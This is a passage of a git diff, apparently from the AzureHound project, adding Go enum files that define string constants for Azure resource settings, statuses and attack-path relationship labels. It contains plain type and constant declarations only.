b/enums/migration_state.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type MigrationState string + +const ( + CompletedMigrationState MigrationState = "Completed" + InProgressMigrationState MigrationState = "InProgress" +) diff --git a/enums/minimum_tls_version.go b/enums/minimum_tls_version.go new file mode 100644 index 0000000..98d6c6e --- /dev/null +++ b/enums/minimum_tls_version.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type MinimumTlsVersion string +type SupportedTlsVersions string + +const ( + TLS1_0 MinimumTlsVersion = "TLS1_0" + TLS1_1 MinimumTlsVersion = "TLS1_1" + TLS1_2 MinimumTlsVersion = "TLS1_2" + TLS10 SupportedTlsVersions = "1.0" + TLS11 SupportedTlsVersions = "1.1" + TLS12 SupportedTlsVersions = "1.2" +) diff --git a/enums/networkaction.go b/enums/networkaction.go new file mode 100644 index 0000000..291bf1f --- /dev/null +++ b/enums/networkaction.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// The default action when no rule from ipRules and from virtualNetworkRules match. This is only used after the bypass +// property has been evaluated. +type NetworkAction string + +const ( + NetworkActionAllow NetworkAction = "Allow" + NetworkActionDeny NetworkAction = "Deny" +) diff --git a/enums/parameter_type.go b/enums/parameter_type.go new file mode 100644 index 0000000..e25f01b --- /dev/null +++ b/enums/parameter_type.go @@ -0,0 +1,32 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type ParameterType string + +const ( + ArrayType ParameterType = "Array" + BoolType ParameterType = "Bool" + FloatType ParameterType = "Float" + IntType ParameterType = "Int" + NotSpecifiedType ParameterType = "NotSpecified" + ObjectType ParameterType = "Object" + SecureObjectType ParameterType = "SecureObject" + SecureStringType ParameterType = "SecureString" + StringType ParameterType = "String" +) diff --git a/enums/patchstatus.go b/enums/patchstatus.go new file mode 100644 index 0000000..b470a7c --- /dev/null +++ b/enums/patchstatus.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type PatchStatus string + +const ( + PatchStatusCompletedWithWarnings PatchStatus = "CompletedWithWarnings" + PatchStatusFailed PatchStatus = "Failed" + PatchStatusInProgress PatchStatus = "InProgress" + PatchStatusSucceeded PatchStatus = "Succeeded" + PatchStatusUnknown PatchStatus = "Unknown" +) diff --git a/enums/redundancy_mode.go b/enums/redundancy_mode.go new file mode 100644 index 0000000..66e9584 --- /dev/null +++ b/enums/redundancy_mode.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type RedundancyMode string + +const ( + ActiveActiveRedundancyMode RedundancyMode = "ActiveActive" + FailoverRedundancyMode RedundancyMode = "Failover" + GeoRedundantRedundancyMode RedundancyMode = "GeoRedundant" + ManualRedundancyMode RedundancyMode = "Manual" + NoneRedundancyMode RedundancyMode = "None" +) diff --git a/enums/relationship.go b/enums/relationship.go new file mode 100644 index 0000000..4dcbfbe --- /dev/null +++ b/enums/relationship.go @@ -0,0 +1,48 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type Relationship string + +// relationshiperated relationships +const ( + RelationshipAZAvereContributor Relationship = "AZAvereContributor" + RelationshipAZContains Relationship = "AZContains" + RelationshipAZContributor Relationship = "AZContributor" + RelationshipAZGetCertificates Relationship = "AZGetCertificates" + RelationshipAZGetKeys Relationship = "AZGetKeys" + RelationshipAZGetSecrets Relationship = "AZGetSecrets" + RelationshipAZHasRole Relationship = "AZHasRole" + RelationshipAZMemberOf Relationship = "AZMemberOf" + RelationshipAZOwner Relationship = "AZOwner" + RelationshipAZRunsAs Relationship = "AZRunsAs" + RelationshipAZVMContributor Relationship = "AZVMContributor" +) + +// Post-processed relationships +const ( + RelationshipAZAddMembers Relationship = "AZAddMembers" + RelationshipAZAddSecret Relationship = "AZAddSecret" + RelationshipAZExecuteCommand Relationship = "AZExecuteCommand" + RelationshipAZGlobalAdmin Relationship = "AZGlobalAdmin" + RelationshipAZGrant Relationship = "AZGrant" + RelationshipAZGrantSelf Relationship = "AZGrantSelf" + RelationshipAZPrivilegedRoleAdmin Relationship = "AZPrivilegedRoleAdmin" + RelationshipAZAZResetPassword Relationship = "AZAZResetPassword" + RelationshipAZUserAccessAdministrator Relationship = "AZUserAccessAdministrator" +) diff --git a/enums/resourcebehavior.go b/enums/resourcebehavior.go new file mode 100644 index 0000000..6942a8f --- /dev/null +++ b/enums/resourcebehavior.go @@ -0,0 +1,39 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// Specifies group behaviors for a Microsoft 365 group +type ResourceBehavior string + +const ( + // Only group members can post conversations to the group. + // If unset ny user in the organization can post conversations to the group. + ResourceBehaviorAllowOnlyMembersToPost ResourceBehavior = "AllowOnlyMembersToPost" + + // This group is hidden in Outlook experiences. + // If unset all groups are visible and discoverable in Outlook experiences. + ResourceBehaviorHideGroupInOutlook ResourceBehavior = "HideGroupInOutlook" + + // Group members are subscribed to receive group conversations. + // If unset Group members do not receive group conversations. + ResourceBehaviorSubscribeNewGroupMembers ResourceBehavior = "SubscribeNewGroupMembers" + + // Welcome emails are not sent to new members. + // If unset A welcome email is sent to a new member on joining the group. + ResourceBehaviorWelcomeEmailDisabled ResourceBehavior = "WelcomeEmailDisabled" +) diff --git a/enums/resourceprovisioning.go b/enums/resourceprovisioning.go new file mode 100644 index 0000000..dbb1dff --- /dev/null +++ b/enums/resourceprovisioning.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// Specifies group resources to be provisioned as part of the Microsoft 365 group. +type ResourceProvisioning string + +const ( + // Provision this group as a team in Microsoft Teams. + // Additionally, this value can also be added on group update through a PATCH operation, in order to provision a + // team from an existing Microsoft 365 group. + ResourceProvisioningTeams ResourceProvisioning = "Teams" +) diff --git a/enums/routing_choice.go b/enums/routing_choice.go new file mode 100644 index 0000000..1d3fcd5 --- /dev/null +++ b/enums/routing_choice.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type RoutingChoice string + +const ( + InternetRouting RoutingChoice = "InternetRouting" + MicrosoftRouting RoutingChoice = "MicrosoftRouting" +) diff --git a/enums/ruleprocessingstate.go b/enums/ruleprocessingstate.go new file mode 100644 index 0000000..6a000b7 --- /dev/null +++ b/enums/ruleprocessingstate.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type RuleProcessingState string + +const ( + RuleProcessingStateOn RuleProcessingState = "On" + RuleProcessingStatePaused RuleProcessingState = "Paused" +) diff --git a/enums/scm_type.go b/enums/scm_type.go new file mode 100644 index 0000000..511b337 --- /dev/null +++ b/enums/scm_type.go @@ -0,0 +1,37 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type ScmType string + +const ( + BitbucketGitScm ScmType = "BitbucketGit" + BitbucketHgScm ScmType = "BitbucketHg" + CodePlexGitScm ScmType = "CodePlexGit" + CodePlexHgScm ScmType = "CodePlexHg" + DropboxScm ScmType = "Dropbox" + ExternalGitScm ScmType = "ExternalGit" + ExternalHgScm ScmType = "ExternalHg" + GitHubScm ScmType = "GitHub" + LocalGitScm ScmType = "LocalGit" + NoneScm ScmType = "None" + OneDriveScm ScmType = "OneDrive" + TfsScm ScmType = "Tfs" + VSOScm ScmType = "VSO" + VSTSRMScm ScmType = "VSTSRM" +) diff --git a/enums/serviceprincipaltype.go b/enums/serviceprincipaltype.go new file mode 100644 index 0000000..dff6e80 --- /dev/null +++ b/enums/serviceprincipaltype.go @@ -0,0 +1,42 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type ServicePrincipalType string + +const ( + // A service principal that represents an application or service. + // The appId property identifies the associated app registration, and matches the appId of an application, possibly + // from a different tenant. If the associated app registration is missing, tokens are not issued for the service + // principal. + ServicePrincipalTypeApplication ServicePrincipalType = "Application" + + // A service principal that represents a managed identity. Service principals representing managed identities can be + // granted access and permissions, but cannot be updated or modified directly. + ServicePrincipalTypeManagedIdentities ServicePrincipalType = "ManagedIdentities" + + // A service principal that represents an app created before app registrations, or through legacy experiences. + // Legacy service principal can have credentials, service principal names, reply URLs, and other properties which + // are editable by an authorized user, but does not have an associated app registration. The appId value does not + // associate the service principal with an app registration. The service principal can only be used in the tenant + // where it was created. + ServicePrincipalTypeLegacy ServicePrincipalType = "Legacy" + + // For internal use. + ServicePrincipalTypeSocialIDP ServicePrincipalType = "SocialIdp" +) diff --git a/enums/share_permissions.go b/enums/share_permissions.go new file mode 100644 index 0000000..40a3eb4 --- /dev/null +++ b/enums/share_permissions.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type DefaultSharePermission string + +const ( + NoPermission DefaultSharePermission = "None" + ShareContributor DefaultSharePermission = "StorageFileDataSmbShareContributor" + ShareElevatedContributor DefaultSharePermission = "StorageFileDataSmbShareElevatedContributor" + ShareReader DefaultSharePermission = "StorageFileDataSmbShareReader" +) diff --git a/enums/signinaudience.go b/enums/signinaudience.go new file mode 100644 index 0000000..de9ef50 --- /dev/null +++ b/enums/signinaudience.go @@ -0,0 +1,35 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// Specifies the Microsoft accounts that are supported for the current application. +type SigninAudience string + +const ( + // Users with a Microsoft work or school account in my organization’s Azure AD tenant (single-tenant). + SigninAudienceMyOrg SigninAudience = "AzureADMyOrg" + + // Users with a Microsoft work or school account in any organization’s Azure AD tenant (multi-tenant). + SigninAudienceMultiOrg SigninAudience = "AzureADMultipleOrgs" + + // Users with a personal Microsoft account, or a work or school account in any organization’s Azure AD tenant. + SigninAudienceMultiOrgAndAccount SigninAudience = "AzureADandPersonalMicrosoftAccount" + + // Users with a personal Microsoft account only. + SigninAudienceAccount SigninAudience = "PersonalMicrosoftAccount" +) diff --git a/enums/signintype.go b/enums/signintype.go new file mode 100644 index 0000000..51d59af --- /dev/null +++ b/enums/signintype.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type SigninType string + +const ( + SigninTypeEmail SigninType = "emailAddress" + SigninTypeUserName SigninType = "userName" + SigninTypeFederated SigninType = "federated" + SigninTypeUserPrincipalName SigninType = "userPrincipalName" +) diff --git a/enums/site_availability_state.go b/enums/site_availability_state.go new file mode 100644 index 0000000..fe5b054 --- /dev/null +++ b/enums/site_availability_state.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type SiteAvailabilityState string + +const ( + DisasterRecoveryModeAvailabilityState SiteAvailabilityState = "DisasterRecoveryMode" + LimitedAvailabilityState SiteAvailabilityState = "Limited" + NormalAvailabilityState SiteAvailabilityState = "Normal" +) diff --git a/enums/site_load_balancing.go b/enums/site_load_balancing.go new file mode 100644 index 0000000..bf36e4a --- /dev/null +++ b/enums/site_load_balancing.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type SiteLoadBalancing string + +const ( + LeastRequestsLoadBalancing SiteLoadBalancing = "LeastRequests" + LeastResponseTimeLoadBalancing SiteLoadBalancing = "LeastResponseTime" + PerSiteRoundRobinLoadBalancing SiteLoadBalancing = "PerSiteRoundRobin" + RequestHashLoadBalancing SiteLoadBalancing = "RequestHash" + WeightedRoundRobinLoadBalancing SiteLoadBalancing = "WeightedRoundRobin" + WeightedTotalTrafficLoadBalancing SiteLoadBalancing = "WeightedTotalTraffic" +) diff --git a/enums/sku_converstion_status.go b/enums/sku_converstion_status.go new file mode 100644 index 0000000..a984746 --- /dev/null +++ b/enums/sku_converstion_status.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type SkuConversionStatus string + +const ( + FailedConversionStatus SkuConversionStatus = "Failed" + InProgressConversionStatus SkuConversionStatus = "InProgress" + SucceededConversionStatus SkuConversionStatus = "Succeeded" +) diff --git a/enums/sku_name.go b/enums/sku_name.go new file mode 100644 index 0000000..b8eb124 --- /dev/null +++ b/enums/sku_name.go @@ -0,0 +1,37 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type SkuName string + +const ( + SKU_Premium_LRS SkuName = "Premium_LRS" + SKU_Premium_ZRS SkuName = "Premium_ZRS" + SKU_Standard_GRS SkuName = "Standard_GRS" + SKU_Standard_GZRS SkuName = "Standard_GZRS" + SKU_Standard_LRS SkuName = "Standard_LRS" + SKU_Standard_RAGRS SkuName = "Standard_RAGRS" + SKU_Standard_RAGZRS SkuName = "Standard_RAGZRS" + SKU_Standard_ZRS SkuName = "Standard_ZRS" + SKU_Basic SkuName = "Basic" + SKU_Free SkuName = "Free" + SKU_NotSpecified SkuName = "NotSpecified" + SKU_Premium SkuName = "Premium" + SKU_Shared SkuName = "Shared" + SKU_Standard SkuName = "Standard" +) diff --git a/enums/spendinglimit.go b/enums/spendinglimit.go new file mode 100644 index 0000000..7052e65 --- /dev/null +++ b/enums/spendinglimit.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type SpendingLimit string + +const ( + SpendingLimitCurrentPeriodOff SpendingLimit = "CurrentPeriodOff" + SpendingLimitOff SpendingLimit = "Off" + SpendingLimitOn SpendingLimit = "On" +) diff --git a/enums/ssl_state.go b/enums/ssl_state.go new file mode 100644 index 0000000..129eb44 --- /dev/null +++ b/enums/ssl_state.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type SslState string + +const ( + DisabledSslState SslState = "Disabled" + IpBasedEnabledSslState SslState = "IpBasedEnabled" + SniEnabledSslState SslState = "SniEnabled" +) diff --git a/enums/ssomode.go b/enums/ssomode.go new file mode 100644 index 0000000..f908563 --- /dev/null +++ b/enums/ssomode.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type SSOMode string + +const ( + SSOModePassword SSOMode = "password" + SSOModeSaml SSOMode = "saml" + SSOModeNotSupported SSOMode = "notSupported" + SSOModeOIDC SSOMode = "oidc" +) diff --git a/enums/statuslevel.go b/enums/statuslevel.go new file mode 100644 index 0000000..2bc84fa --- /dev/null +++ b/enums/statuslevel.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type StatusLevel string + +const ( + StatusLevelError StatusLevel = "Error" + StatusLevelInfo StatusLevel = "Info" + StatusLevelWarning StatusLevel = "Warning" +) diff --git a/enums/storage_account_access_tier.go b/enums/storage_account_access_tier.go new file mode 100644 index 0000000..d6ddc3e --- /dev/null +++ b/enums/storage_account_access_tier.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type StorageAccountAccessTier string + +const ( + CoolAccessTier StorageAccountAccessTier = "Cool" + HotAccessTier StorageAccountAccessTier = "Hot" + PremiumAccessTier StorageAccountAccessTier = "Premium" +) diff --git a/enums/storage_account_provisioning_state.go b/enums/storage_account_provisioning_state.go new file mode 100644 index 0000000..a1c7e8a --- /dev/null +++ b/enums/storage_account_provisioning_state.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type ProvisioningState string + +const ( + CreatingState ProvisioningState = "Creating" + ResolvingDNSState ProvisioningState = "ResolvingDNS" + SucceededState ProvisioningState = "Succeeded" +) diff --git a/enums/storage_account_status.go b/enums/storage_account_status.go new file mode 100644 index 0000000..b951976 --- /dev/null +++ b/enums/storage_account_status.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type AccountStatus string + +const ( + AvailableStatus AccountStatus = "available" + UnavailableStatus AccountStatus = "unavailable" +) diff --git a/enums/storage_container_public_access.go b/enums/storage_container_public_access.go new file mode 100644 index 0000000..47c9523 --- /dev/null +++ b/enums/storage_container_public_access.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type PublicAccess string + +const ( + BlobPublicAccess PublicAccess = "Blob" + ContainerPublicAccess PublicAccess = "Container" + NoPublicAccess PublicAccess = "None" +) diff --git a/enums/storagetype.go b/enums/storagetype.go new file mode 100644 index 0000000..a1754cb --- /dev/null +++ b/enums/storagetype.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type StorageType string + +const ( + StorageTypePremium_LRS StorageType = "Premium_LRS" + StorageTypePremium_ZRS StorageType = "Premium_ZRS" + StorageTypeStandardSSD_LRS StorageType = "StandardSSD_LRS" + StorageTypeStandardSSD_ZRS StorageType = "StandardSSD_ZRS" + StorageTypeStandard_LRS StorageType = "Standard_LRS" + StorageTypeUltraSSD_LRS StorageType = 